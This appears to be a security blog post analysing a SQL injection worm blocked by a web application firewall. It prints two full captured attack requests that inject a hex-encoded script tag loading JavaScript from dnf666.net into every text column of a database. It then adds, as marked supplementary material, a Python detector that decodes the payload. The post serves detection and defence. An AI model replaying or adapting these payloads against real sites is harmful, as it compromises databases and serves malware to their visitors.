
SQL Injection worm with new injection domain dnf666.net

Our ZION SECURED WAMAF has been blocking a lot of attacks lately. Some of them are worth investigating because they reveal new threats.

Most of you probably know about the Asprox worm; see http://matchent.com/wpress/?q=node/419.

This weekend a bot attacked this blog, which is protected by ZION SECURED WAMAF:

GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20
cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%
20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.
xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f
EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0
)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c
onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D
687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%
20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20
tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t
AbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: *#

The User-Agent header shows that this is not a browser but the well-known tool curl, running on Windows. This request tests whether the database already holds data containing the string dnf666, probably to see whether it is already infected with the malicious payload.

Because we don't reply with an HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:

GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR
%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,
sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20
(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20
b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B
cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6
E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20
tAbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: *#
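
As an added example (not part of the original post), here is a small Python detector that normalizes such a request the way a WAF or log parser would and decodes the hex literal to reveal what the worm injects into every text column. The sample query string is constructed from the captured request above; the indicator names and the "three signals" threshold are my own choices.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample: key parts of the captured query string, hex literal copied from the post.
SAMPLE_QUERY = (
    "show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20"
    "dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20"
    "FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20"
    "oPeN%20tAbLe_cursoR%20while(@@fEtCh_status=0)%20bEgIn%20"
    "exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=%5B'%2B@c%2B'%5D"
    "%2BcAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E66363636"
    "2E6E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))')%20eNd;--"
)

# Structural indicators of the worm, matched against the normalized query.
INDICATORS = {
    "schema_walk": r"from\s+sysobjects\s+\w+\s*,\s*syscolumns",
    "cursor_loop": r"declare\s+\w+\s+cursor\s+for.*@@fetch_status",
    "dynamic_update": r"exec\s*\(\s*'update",
    "hex_cast": r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar",
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})")
HOSTNAME = re.compile(r"https?://([a-z0-9.-]+)")

def normalize(query: str) -> str:
    """URL-decode twice (catches double encoding) and fold the mixed case;
    the second pass uses unquote so '+' from the first pass survives."""
    return unquote(unquote_plus(query)).lower()

def decode_hex_literals(sql: str) -> list:
    """Render every 0x... literal as the text SQL Server would CAST it to."""
    texts = []
    for hexstr in HEX_LITERAL.findall(sql):
        if len(hexstr) % 2 == 0:  # an odd-length literal is not a byte string
            texts.append(bytes.fromhex(hexstr).decode("latin-1"))
    return texts

def analyze_query(query: str) -> dict:
    """Report which indicators fired and what the hex payload injects."""
    sql = normalize(query)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, sql, re.S)]
    payloads = decode_hex_literals(sql)
    domains = sorted({h for p in payloads for h in HOSTNAME.findall(p)})
    return {
        "mass_injection": len(hits) >= 3,  # several signals, not one keyword
        "indicators": hits,
        "payloads": payloads,
        "domains": domains,
    }
```

Decoding the CAST literal is what turns an opaque request line into an actionable indicator: the script tag and the dnf666.net host it loads from are what you would search your own tables for to confirm or rule out infection.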
